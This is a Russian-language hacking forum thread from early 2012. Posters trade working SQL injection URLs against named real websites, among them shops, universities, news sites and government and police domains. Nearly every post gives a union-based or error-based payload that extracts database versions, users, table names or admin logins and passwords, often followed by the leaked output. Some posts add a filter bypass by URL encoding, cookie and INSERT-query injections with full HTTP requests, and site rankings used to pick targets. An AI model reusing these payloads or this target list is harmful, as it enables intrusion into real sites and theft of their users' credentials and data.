5.0.90:barabaka@localhost:biatlonblog
Error based SQL injection
helpkassa.ru:
Code:
http://helpkassa.ru/?id=1624%27%20and%28select+1+from%28select+count%2 8*%29,concat%28%28select+concat_ws%280x3b,user%28% 29,database%28%29,version%28%29%29+from+informatio n_schema.tables+limit+0,1%29,floor%28rand%280%29*2 %29%29x+from+information_schema.tables+group+by+x% 29a%29--%20+11
Еврейский развлекательный сайт
Code:
http://ciekawostki.eu/humor.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10--
PR = 3
Данные от админки в базе.
[stranger]
14.01.2012, 01:23
Code:
http://www.oblenergo.odessa.ua/?alias=pressa&pub=-137+union+select+1,2,3,4,5,6,7,concat_ws(0x3b,data base(),user(),version()),9,10,11,12+--+
dbooe_news;menu@localhost;5.1.11-beta
Code:
http://www.coda-cerva.be/index.php?option=com_organization&view=people&id=-125+UNION+SELECT+1,concat_ws%280x3a,user%28%29,ver sion%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,1 2--&lang=nl
JUSER@LOCALHOST:5.0.18:WEB_DATA_ORGANIZATION_DB
GooglePR: 6
Магазинчик
Code:
http://www.a-k-a.net/prod_detail.php?id=-2+union+select+1,database(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32-
тИЦ = 10
PR = 3
Еще один
Code:
http://www.quiltchalet.com/prod_detail.php?ID=-21+union+select+1,2,3,4,5,6,concat_ws()0x3a,userps swd,name),8,9,10,11,12,13+from+admin--
[stranger]
15.01.2012, 00:04
Code:
http://www.blog.oss-studio.com.ua/?go=/blog/one&id=-08024530+union+select+1,concat_ws(0x3b,user(),data base(),version()),3,4,5,6+--+
best1_blog@91.206.200.121;best1_blog;5.1.56-log
Разработка сайтов
Code:
http://www.kom.su/designsite/site.php?id=-183+union+select+version(),2,3,4%20--
ТиЦ=100
PR = 1
Разработка веб-приложений
Code:
http://www.it-key.su/site.php?id=-15+union+select+1,table_name,3,4,5,6,7,8+from+info rmation_schema.tables--
Сайты - "близнецы" можно сказать )
http://www.mainstreetmallonline.com/patterns/listingview.php?ref=15&num=-15274' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 ,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,8 7,88,89,90,91,92,93,94,95,96,97,98,concat_ws(0x3a, @@version,user(),database()),100,101,102--+'
Вывод в тайтл !
Google PR: 3
Version : 5.0.82sp1-log
User: patterns@localhost
Database: patterns
И второй :
http://mainstreetvintage.com/listingview.php?ref=21&num=-7804' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 ,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,conc at_ws(0x3a,@@version,user(),database()),87,88,89--+'
Также вывод в тайтл !
Google PR: 2
Version: 5.0.82sp1-log
User: vintage@localhost
Database: mainstreetvintage
Министерство внутренних дел - POLICIJA
Code:
http://www.policija.si/eng/index.php/index.php?option=com_tiralice&view=tiralicedetail&Itemid=153&kljuc=-167147+/*!union*/+/*!select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,concat_ws%280x3a,user%28%29,version%28%29,dat abase%28%29%29,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37%20from%20jos_users--&cr=5169326&v=v_isk&s=ne
joomla@vmysql.policija.si:5.0.67-community-log:joomla_en
GooglePR: 7
тИЦ10
Интересная скулья.
Идем по адресу:
Code:
http://rocich.ru/article.php?sid=48-999.9+union+select+1,version(),3,4,5,6,7--+f
Перенаправляет на:
Code:
http://www.geoteka.ru/text.html?page=4.0.27-log
--
тИЦ90
Code:
http://www.auditline.ru/article.php?sid=-639+union+select+1,2,3,version(),5,6,7,8,9--+f
P.S. Я ржал
Статусы для контакта, icq
Code:
http://www.novyestatusy.ru/status.php?id=-3301+union+select+1,2,3,database(),5,6,7,8,9 --
Строительный магазин\фирма
Code:
http://www.materiauxspecl.com/produit.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,concat_ws(0x3a,user,pass),18,19,20,21,22,23,24 +from+login--
PR = 3
Code:
http://www.glac.fr/en/produit.php?id=-66+union+select+table_name,2,3+from+information_sc hema.tables+limit+0,1--
Вывод в title.
PR = 2
Еще один магазин
Code:
www.maytech.fr/produit.php?id=-124+union+select+1,2,3,4,5,concat_ws(0x3a,login,pa ss),7,8,9,10,11,12,13,14,15,16+from+users --
PR = 1
Code:
http://www.boutiquesante.be/produit.php?id=-62+union+select+1,2,3,table_name,5,6,7+from+inform ation_schema.tables--
PR = 3
Магазины
PR = 3
Code:
http://www.ovadesign.com/site/produit.php?id=-47+union+select+1,2,concat_ws(0x3a,login,password) ,4,5,6,7,8,9,10,11,12,13+from+user--
PR = 4
Code:
http://piaggio.ma/piaggio/produit.php?id=-15+union+select+1,concat_ws(0x3a,user,password),3, 4,5+from+administration--
PR = 1
Code:
http://www.agrideal.fr/an/produit.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),1 3,14,15%20--
Защита от peterhost.
Фильтр выглядит как-то так приблизительно:
/union(.*)select/is
Т.е. срабатывает даже union.php?select =)) не говоря уже о union%0Aselect и т.п. примерам.
Однако это все равно легко обходится «полным» url кодированием.
PHP:
$str="' union select";//$_GET['s'];
foreach(str_split($str) AS$s)
print'%'.bin2hex($s);
concat_ws(0x3a,database(),version(),user())
Code:
www.fotodi.ru/books-text.php?id=224%27%20%61%6e%64%20%31%3d%33%20%75%6 e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33% 2c%34%2c%35%2c%36%2c%37%2c%63%6f%6e%63%61%74%5f%77 %73%28%30%78%33%61%2c%64%61%74%61%62%61%73%65%28%2 9%2c%75%73%65%72%28%29%2c%76%65%72%73%69%6f%6e%28% 29%29%2c%39%20%2d%2d%20%31
P.S http://www.fotodi.ru/admin/ Жмакаем «Отмена». Я ржал.
тИЦ = 70
PageRank 4
Code:
http://www.chernyahovsk.su/index.php?cat=-1+union+select+1,concat_ws(0x3a,login,password),3, 4+from+auth_user --
oODungVTOo
17.01.2012, 10:50
http://myhomedeco.com/list.php?cat=17&sub=18%20/*!union*/%20select%201,2,3,4,5,6,7,8,9,10,11,Group_Concat(/*!Table_Name*/),13,14,15,16,17,18,19,20,21,22,23,24%20from%20%60 information_schema%60.tables%20where%20table_schem a=database%28%29--%20-
help me, pls!
stepashka_
17.01.2012, 10:57
oODungVTOo said:
http://myhomedeco.com/list.php?cat=17&sub=18%20/*!union*/%20select%201,2,3,4,5,6,7,8,9,10,11,Group_Concat(/*!Table_Name*/),13,14,15,16,17,18,19,20,21,22,23,24%20from%20%60 information_schema%60.tables%20where%20table_schem a=database%28%29--%20-
help me, pls!
http://myhomedeco.com/list.php?cat=17&sub=18+/*!union+select*/+1,/*!table_name*/,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+ information_schema.tables+--+
Pirotexnik
17.01.2012, 17:48
zshda.gov.al
Code:
http://www.zshda.gov.al/index.php?id=11+union+select+1,concat_ws(0x3a,TABL E_NAME)+from+information_schema.tables+--+
Салон ювелирных украшений
ТиЦ = 10
PR = 1
Code:
http://www.uvelirniymir.ru/index.php?idd=-14+union+select+1,concat_ws(0x3a,LOGIN,PASS),3,4,5 ,6,7,8,9,10+from+kapital_zed_users--
Админку не нашел.
Code:
http://library.au.edu/searchbooks.asp?step=step2&table=subject&title=1%27+or+1=@@version+--+
Microsoft SQL Server 2000 - 8.00.760
Google PR: 6
Демократия.ру
С барского плеча
тИЦ = 400
PR = 3
индекс > 12000 страниц
Code:
http://www.democracy.ru/article.php?id=-3241+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14,15,16--
http://autotop.com.ua/top.php?cat=-1+union+select+1,2,3,4,concat_ws(0x3a,mail,passwor d),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+fro m+top_users--
http://www.bighome.ru/index.php?view=1&rieltor_id=14&sel_type=2&id=-391+UNION+SELECT+1,2,concat_ws(0xa,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84 ,85,86,87,88,89,90,91,92,93,94,95--
Dr.Strangelove
19.01.2012, 15:45
Code:
http://www.cirs-tm.org/researchers/researchers.php?id=-999'+union+select+1,concat_ws(0x3a,user(),version( ),database()),3,4,5,6,7,8,9,10,11,12,13,14,15/**
cirstm@localhost:4.1.22-standard:cirstm_db
PR=7
С таблицами глухо как в танке. Кто подберет?
PR = 2
Code:
http://www.tvoe-koleso.ru/price.php?id=-16+union+select+1,table_name,3,4,5,6,7,8,9,10,11+f rom+information_schema.tables%20--
// dIv спешиал фор ю
Code:
http://villagesamphitheater.com/home.php?id=-13+union+select+1,2,3,4,table_name,6,7,8+from+info rmation_schema.tables%20--
Музыкальный
ТиЦ = 10
PR = 2
Code:
http://notabene.od.ua/music.php?id=-42+union+select+1,table_name,3,4,5,6+from+informat ion_schema.tables%20--
PR = 2
Code:
http://www.afritonas.com/music.php?id=-6+union+select+1,concat_ws(0x3a,username,password) ,3,4,5,6,7,8,9+from+admin--
тИЦ 20 PR4
Sql-injection в куках.
http://neocleous.com/
Code:
Cookie: LangCookie=en'and(select+1+from(select+count(*),co ncat((select+concat(password,0x00)+from+ws_users+l imit+0,1),floor(rand(0)*2))x+from+information_sche ma.tables+group+by+x)a)--+f;
5.0.27:admin_neo@localhost:webstudio_201_neo
P.S. Довольно крупная компания в Кипре
PR = 4
Code:
http://www.weltenklang.at/music.php?id=-78+union+select+1,2,concat_ws(0x3a,login,passwort) ,4,5,6,7,8,9,10+from+wkadmin--
[RoA]
Code:
http://roa.hu/index.php?page=blog&name=information_schema.tables+group+by+concat(ver sion(),0x00,rand(0)|0)+having+min(0)--+f
Code:
Duplicate entry '5.5.15-log' for key 'group_key'
P.S. Скулья особенная, попробуйте вместе information_schema.tables поставить другое слово(имеется ввиду не сущ. таблица)
UPD. Ждем скулью
http://prostoi-smertnyj.ru/index.php?a=1+union+select+version()--+f
PR = 4
Code:
http://www.tiny-lights.com/flash.php?id=-329+union+select+1,table_name,3,4,5+from+informati on_schema.tables--
PR = 4
Code:
http://www.flashmeat.com/flash/flash.php?ID=-83+union+select+table_name,2,3,4,5,6,7,8,9+from+in formation_schema.tables--
PR = 2
Вывод в title
Code:
http://www.slimezone.com/flash.php?id=-70+union+select+1,table_name,3,4,5,6,7,8+from+info rmation_schema.tables--
Code:
http://www.triumf-obuv.ru/man.php?id=-23+union+select+1,2,3,table_name,5,6,7,8,9,10,11+f rom+information_schema.tables--
MOA
Code:
http://www.moa.by/?page=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8--+f
4.1.22-max:moaby@localhost:moaby_MOA
P.S. Ждем LOA, AMA, SM и A
PR = 1
Code:
http://www.sogefi.be/detail-maison.php?id=-291+union+select+1,concat_ws(0x3a,email,password), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25+from+user--
PR = 2
Code:
http://www.gallinagos.com/animal.php?id=-67+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r,pass),10,11+from+users--
Code:
http://www.lovesurfing.ru/tost.php?id=-1+union+select+1,table_name+from+information_schem a.tables0--
Code:
http://www.capturegis.com/pages.php?id=-10+union+select+1,2,concat_ws(0x3a,username,passwo rd),4+from+ccs_admin--
stepashka_
23.01.2012, 10:16
http://www.online-ul.com/stroirem/index.php?id_typ=248+/*!union+select*/+1,2,3,4,5,6,/*!table_name*/,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+in formation_schema.tables+--+
PR = 1
Code:
http://www.satsanga.ru/trips/trip.php?nid=-1+union+select+1,version(),3,4,5,6,7,8,9,10%20--
----
PR = 3
Code:
http://www.hiraethog.org.uk/content.php?nID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,admi nUsername,adminPassword),10,11,12,13,14+from+admin User0--
stepashka_
23.01.2012, 11:22
http://www.razborka61.ru/7doska/ind.php?id_typ=8+union+select+1,2,3,4,5,6,version( ),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3+--+
4 ветка(
http://www.nordiz.ru/tovar.php?tovar_id=-1+union+select+1,2,3,4,5,group_concat(0x0b,table_n ame),7,8,9,10,11,12,13,14,15,16,17,18,19,20,group_ concat(0x0b,table_name),22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63, 64,65,66,67,68,69,70,71,72+from+information_schema .tables--
http://www.sotovikm.ru/tovar.php?ID=18209+union+select+1
Как здесь обходить фильтрацию пробелов я хз
http://www.angelbaby.ru/tovar.php?ld=-1+union+select+1,2,3,4,5,6,7,8,9,group_concat(0x0b ,table_name),11,12,13+from+information_schema.tabl es--
bodrich said:
http://www.sotovikm.ru/tovar.php?ID=18209+union+select+1
Как здесь обходить фильтрацию пробелов я хз
Это надо постить в тему с вопросами и там фильтрация не только пробелов.
Code:
http://www.atlanticframe.com/detail.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+
PR: 3
version: 5.0.91
database: Website2009
user: Greenfield09@205.178.145.68
Официальный сайт Федеральной службы по надзору в сфере образования и науки // Для истории (уязвимость залатали)
Code:
http://obrnadzor.gov.ru/ru/press_center/gallery/index.php?album_id40=35'sql-injection'
тИЦ: 3300 / PR: 8
Уважаемый ----
Благодарим Вас за содействие. В настоящее время Федеральной службой по надзору в сфере образования и науки проведены работы по повышению общей защищенности сайта.
Будем признательны, если Вы и в дальнейшем сможете обращать внимание на аспекты деятельности Рособрнадзора, требующие совершенствования.
---
С уважением,
Постников Алексей Александрович,
Начальник Управления делами Рособрнадзора
Email: postnikov@obrnadzor.gov.ru
Кафедра квантовой физики МГУ
PR = 4
Code:
http://nanolab.phys.msu.ru/person.php?lang=rus&id=-29+union+select+1,2,concat_ws(0x3a,username,passwd ),4,5,6,7,8,9,10,11,12,13+from+user--
При выводе пароля обрезает union
HellFire
24.01.2012, 11:29
Университет на Гаваях.
Code:
http://hilo.hawaii.edu/academics/hohonu/writing.php?id=1-666.666+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCA T(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User( )),0x71),0x71),2,3,4,5,6--
Database Version: 5.0.92-log
Database name: hohonu
User name: hohonu@www.uhh.hawaii.edu
ТИЦ: 800
PR: 7
Федеральное государственное учреждение "Федеральный медицинский биофизический центр имени А.И.Бурназяна"
ТиЦ = 80
PR = 4
Code:
http://www.fmbcfmba.ru/index.php?type=page&page_id=-10+union+select+1,2,table_name,4,5,6,version%28%29 +from+information_schema.tables%20--
HellFire
26.01.2012, 15:05
Американская золотая биржа.
Code:
http://www.amergold.com/vault/numisdetails.php?id=1-666.666+UNION+SELECT+1,2,3,4,5,6,7,AES_DECRYPT(AES _ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x 2F2A2A2F,User()),0x71),0x71),9,10,11,12,13,14--
Database Version: 5.0.77
Database name: age
User name: amergold@localhost
ТИЦ: 10
PR: 4
Газета Financial Express (Бангладеш).
Code:
http://www.thefinancialexpress-bd.com/innerpage.php?page_category_id=1-0.1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Ve rsion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0 x71),0x71)--
Database Version: 5.0.92-50-log
Database name: thefinan_db
User name: thefinan_fe@localhost
ТИЦ: 20
PR: 5
aydin-ka
27.01.2012, 02:17
ТИЦ 110 Траф 1К
Code:
http://bienes.ru/news/view/?id=1+union+select+1,concat_ws%280x3a,user%28%29,d atabase%28%29,version%28%29%29,3,4,5--+
iwanttobeh_biu@localhost:iwanttobeh_bi:5.1.46
Code:
http://bienes.ru/news/view/?id=1+union+select+1,concat_ws%280x3a,name,info%29 ,3,4,5+from+magazine--+
hxxp://services.shop3m.com/search/?btnG.x=18&btnG.y=18&btnG=Search&keyword=' OR 1=1-- '
PR: 5
Alexa Rank: 187,654
OS: Linux Red Hat Enterprise 5 (Tikanga)
Database: MySQL > 5
User: root@localhost
file_priv Y
Сразу выложу БД, чтобы не мучались : ))
information_schema
myaccount
mysql
newsletters
shop3Msearch
WDSR
aydin-ka
27.01.2012, 14:53
ТИЦ 100 Траф 1К
Code:
http://www.braingames.ru/?sort_key=usersRating&sort_dir=down&path=usersrating&page=2&user_name=&user_group=99999999+union+select+1,concat_ws%280x3 a,user%28%29,database%28%29,version%28%29%29,3,4,5 ,6,7,8,9,10,11--+
bg@localhost:bg:5.0.51a-24+lenny5-log
Code:
http://www.braingames.ru/?sort_key=usersRating&sort_dir=down&path=usersrating&page=2&user_name=&user_group=99999999+union+select+1,group_concat%28 0x3a,usersName,usersEmail%29,3,4,5,6,7,8,9,10,11+f rom+users_t--+
http://www.braingames.ru/admin - 403
Яндекс тИЦ 60
Google Page Rank 4/10
http://enter.private.com/signup/signup.php?nats=MC4wLjIuNi4wLjAuMC4wLjA&idScene=-7161+union+select+1,2,3,4,5,6,group_concat%28Login ,0x0a,Pass,0x0a%29,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24+from+adminlogin
Админку так и не нашёл =(
Code:
http://www.respo.ru/catalog.php?page=1&type=-7+union+select+1,user(),version(),4,5,6,7--+f
HellFire
29.01.2012, 18:47
Магазин ShareWare софта.
Code:
http://www.sharewareriver.com/product.php?id=10000-0.1+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(C ONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,U ser()),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23--
Database Version: 5.0.91-log
Database name: a0020843
User name: zoika@cgi1001.int.bizland.net
ТИЦ: 30
PR: 4
aydin-ka
30.01.2012, 23:15
ТИЦ 300
Code:
http://www.alt-x.ru/help/works_outside.php?page_id=99999999+union+select+1, 2,3,4,concat_ws%280x3a,user%28%29,database%28%29,v ersion%28%29%29,6,7,8,9,10--+
gb_altx2@10.0.2.2:gb_altx2:5.1.52-log
aydin-ka
31.01.2012, 02:17
ТИЦ 100
Code:
http://crdz.ru/view.php?id=999999999+union+select+1,@@version,3,4--+
Вывод в теге "title" 4.1.20-log
Code:
http://crdz.ru/view.php?id=999999999+union+select+1,id,3,4+from+u sers--
Логин сбрутить не смог
http://tools.biz.ua/index.php?category=3-0.9999+union+select+1,version(),3,4,5,6,7--+
http://energo.biz.ua/index.php?category=5-0.9999+union+select+1,version(),3,4,5,6,7--+
http://food.biz.ua/index.php?category=1-0.9999+union+select+1,version(),3,4,5,6,7--+
http://catalog.biz.ua/index.php?category=12-0.9999+union+select+1,group_concat(0x0b,table_name ),3,4,5,6,7+from+information_schema.tables--+
HellFire
31.01.2012, 20:17
Торговая железнодорожная площадка.
Code:
http://railtransport.ru/index.php?page=show_zapchast&id=1-0.1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Ve rsion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0 x71),0x71),2,3--
Database Version: 5.5.1-m2-log
Database name: db42618m
User name: m42618@fhe16.hoster.ru
ТИЦ: 50
PR: 3
Магазин мобильных приложений
Site: mappn.com
Inject
Code:
_ttp://mappn.com/soft.php?id=2+/*%2130000and(select+1+from(select+count(*),concat( (select+(select+(select+@@version)+)+from+informat ion_schema.tables+limit+0,1),floor(rand(0)*2))x+fr om+information_schema.tables+group+by+x)a)+and+1=1 */
Version: 5.0.45
User: mappn@192.168.51.100
Database: mappn
PR: 5
TYC: 10
totenkopf
01.02.2012, 06:17
Code:
http://t-nalog.ru/news.php?n=29'+and+0+UNION+SELECT+1,group_concat(c oncat_ws(0x3a,login,password,email)),3,4,5+FROM+us ers+--+
http://www.it4life.ru/cat.php?typeid=5589+and+0+UNION+SELECT+1,group_con cat(concat_ws(0x3a,login,pswd))+FROM+adm+--+
http://www.dip8.ru/shop.php?gr=7&subgr=11+and+0+UNION+SELECT+group_concat(concat_ws (0x3a,login,parol)),2,3+FROM+it_a_autorize+--+
http://gmg2011.motoguzzi.com/news.php?news=15'+and+0+UNION+SELECT+1,2,3,4,5,con cat_ws(0x3a,user(),version(),database()),7,8,9,10, 11+--+
http://www.mcdracing.com/news.php?news=31+and+0+UNION+SELECT+1,2,3,concat_w s(0x3a,user(),version(),database()),5,6,7,8,9+--+
http://www.unutki.org/news.php?news_id=123&doc_id=6+and+0+UNION+SELECT+concat_ws(0x3a,user(), version(),database()),2,3,4+--+
http://www.thelondonfiltercompany.com/news.php?news_id=1+and+0+UNION+SELECT+1,concat_ws( 0x3a,user(),version(),database()),3,4+--+
http://www.educavision.com/news.php?news_number=4+and+0+UNION+SELECT+concat_w s(0x3a,user(),version(),database()),2,3,4,5,6,7+--+
http://www.norcotek.com/news.php?news_id=32+and+0+UNION+SELECT+1,concat_ws (0x3a,user(),version(),database()),3,4+--+
http://www.ontheminute.com/news/news.php?news=31114+and+0+UNION+SELECT+1,2,concat_ ws(0x3a,user(),version(),database()),4,5,6,7,8,9,1 0,11,12+--+
http://www.shamass.org/news.php?news_id=52+and+0+UNION+SELECT+1,2,3,4,5,c oncat_ws(0x3a,user(),version(),database()),7,8,9,1 0,11+--+
http://www.delawarelawweekly.com/news.php?news_id=2896+and+0+UNION+SELECT+1,2,3,4,5 ,6,7,8,9,10,concat_ws(0x3a,user(),version(),databa se()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29+--+
http://deepsouthmedia.co.uk/view-news.php?news_id=198'+and+0+UNION+SELECT+1,2,3,con cat_ws(0x3a,user(),version(),database()),5+--+
http://www.mammacare.com/news.php?news_id=6+and+0+UNION+SELECT+1,2,concat_w s(0x3a,user(),version(),database())+--+ html body
http://www.arrowpoint.net/news.php?news_id=702+and+0+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,concat_ws(0x3a,user(),version(),database( )),28+--+
http://www.evolvedance.co.uk/news.php?news_id=0+and(select+1+from(select+count( *),concat((concat_ws(0x3a,user(),version(),databas e())),floor(rand(0)*2))x+from+information_schema.t ables+group+by+x)a)
[stranger]
02.02.2012, 20:56
http://www.dabi.
gov.ua
/news_text.php?id=-1+union+select+1,2,concat_ws(0x3b,user(),database( )),version(),null,6+--+
u_dabi@localhost;dabi
5.0.51a-24+lenny5
aydin-ka
03.02.2012, 13:38
ТИЦ 350
Code:
http://www.agidel.ru/?rid=10¶m1=99999999+union+select+1,2,3,4,5,concat_ws%2 80x3a,user%28%29,database%28%29,version%28%29%29,7 ,8,9,10--+
slpk@192.168.13.1:main:4.1.22-log
kravch_v
04.02.2012, 18:23
Горящие туры в Грецию, Бали, Кипр, Тайланд - Туристическая фирма Познай Мир.
тИЦ - 90
Code:
http://www.poznay-mir.ru/about.php?uid=-1 AND 1=0 UNION ALL SELECT 1,CONCAT(0x3c454d553e,CONCAT_WS(0x3c5345503e,datab ase(),version(),user()),0x3c2f454d553e),3,4,5
poznaymir;5.0.87;root@zvm32.host.ru
Code:
http://www.borodin-moka.ru/answers/index.php?id=-1 AND 1=0 UNION ALL SELECT 1,2,3,CONCAT(0x3c454d553e,CONCAT_WS(0x3c5345503e,u ser(),database(),version()),0x3c2f454d553e)
borodin-mokaru@localhost;borodinmokaru;5.0.51a-24+lenny5-log
HellFire
04.02.2012, 19:35
Мировое искусство: живопись, литература, анимация, кино.
Code:
http://www.world-art.ru/cinema/cinema_episode.php?id=18187&episode=1-0.1+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(C ONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,U ser()),0x71),0x71),6,7,8,9,10,11,12,13--
Database Version: 5.5.2-m2-log
Database name: wwwworldartru
User name: worldart@localhost
ТИЦ: 1700
PR: 3
Федеральный альянс по безопасности дома.
Code:
http://flash.org/peril_inside.php?id=1-0.1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT( Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()) ,0x71),0x71),3,4,5--
Database Version: 5.0.77-log
Database name: flash
User name: flash@localhost
ТИЦ: 10
PR: 7
Саундтреки к фильмам.
Code:
http://www.soundtrack.net/trailers/composer-trailer.php?id=1-0.1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Ve rsion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0 x71),0x71),2,3,4--
Database Version: 5.0.77
Database name: STN
User name: stn@localhost
ТИЦ: 70
PR: 6
Skofield
05.02.2012, 08:21
Code:
http://hci.stanford.edu/courses/cs547/speaker.php?date=-2012-01-27'+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),user(),database()),7,8,9,0,11,12,13,14,15,16--+
Database Version: 5.0.77
Database name: hci
User name: hci@localhost
---------------------------------------------------------------------------------------------------------
Code:
http://icme.stanford.edu/seminars/seminarInfo.php?seminar_id=17+union+select+1,2,3,4 ,5,6,7,8,9,0,11,group_concat(table_name),13,14,15, 16+from+information_schema.tables--
Database Version: 5.1.49-3~bpo50+1-log
Database name: d_ICME_website
User name: dICMEwebsite@www01.Stanford.EDU
free-jpeg.ru
SQL инъекция в INSERT запросе, параметр в куках, метод - Error based, дак еще и каптчу каждый раз придется вводить.
POST http://free-jpeg.ru/reg/
Head:
Code:
Host: free-jpeg.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://free-jpeg.ru/registration/
Cookie: ref=681%27%2C%27123123123%27%29+ON+DUPLICATE+KEY+U PDATE+a%3D%28select+1+from%28select+count%28%2A%29 %2Cconcat%28%28select+concat_ws(0x3a,database(),ve rsion(),user())+from+information_schema.tables+lim it+0,1%29%2Cfloor%28rand%280%29%2A2%29%29x+from+in formation_schema.tables+group+by+x%29a%29--+11; PHPSESSID=_SESS_HERE_
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Body
Code:
name=Soochechqa&email=123123s%40sd.ru&wm=R9999999999&pass=R9999&pass2=R9999&code=CAPTCHA_HERE&imageField.x=59&imageField.y=19
_SESS_HERE_ - PHPSESSID
CAPTCHA_HERE - код что изображен на http://free-jpeg.ru/captcha/pic.php
Результат:
Code:
Duplicate entry 'qwcat_urgepjeerf1102g:5.1.49-rel11.3-log:043353008_nit50h@local' for key 'group_key'
aydin-ka
08.02.2012, 01:42
ТИЦ 160 Траф 2К
Code:
http://www.vizd.ru/informdesk.php?cat=27&ann_id=-1%27+union+select+1,2,3,4,concat_ws%280x3a,user%28 %29,database%28%29,version%28%29%29,6,7,8,9,10,11, 12,13--+
vizd_user@89.108.110.196:vizd_db:5.0.77
HellFire
08.02.2012, 05:49
Комитет участников рынка ценных бумаг.
Code:
http://www.comitet.ru/forum/see.php?id=666-666+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT( Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()) ,0x71),0x71),3,4,5,6--
Database Version: 5.0.45-log
Database name: h2safed_comitet
User name: h2safed_comitet@www1.100mb.ru
ТИЦ: 50
PR: 4
Финский туризм.
Code:
http://www.to-finland.ru/index.php?id=1-0.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Dat abase(),0x2F2A2A2F,User())--
Database Version: 5.1.49-3-log
Database name: z70438_finb
User name: z70438_finb@77.221.130.2
ТИЦ: 60
PR: 3
Студенческая гильдия.
Code:
http://www.guildonline.net/sgdsp/dispsite.php?groupsiteseq=1&pageseq=1-0.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Dat abase(),0x2F2A2A2F,User()),3,4--
Вывод в титле.
Database Version: 4.1.20
Database name: c17db1
User name: c17my1@localhost
ТИЦ: 0
PR: 5
тИц: 40
PR: 4
Code:
http://golosislama.ru/?cat=-1'+union+select+1,login,3,4,5,6,7,8,password,10,11 ,12,13,14,15,16,17,18,19,20,21+%0Afrom+users+limit +1,1000+--+
Code:
http://web.mit.edu/press/component/mitexperts/?catid=1+union+select+1,version(),3,4,5,6,7,8,9,10 ,11,12, 13--+
nemaniak
08.02.2012, 20:18
interself.ru ТИЦ-110
Code:
www.interself.ru/info/newsshow.php?num=-273+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8+--+
Code:
5.1.45-log:ud_03_01adm@localhost:ud_03_44668_interself
lovemarks.com PR-5
Code:
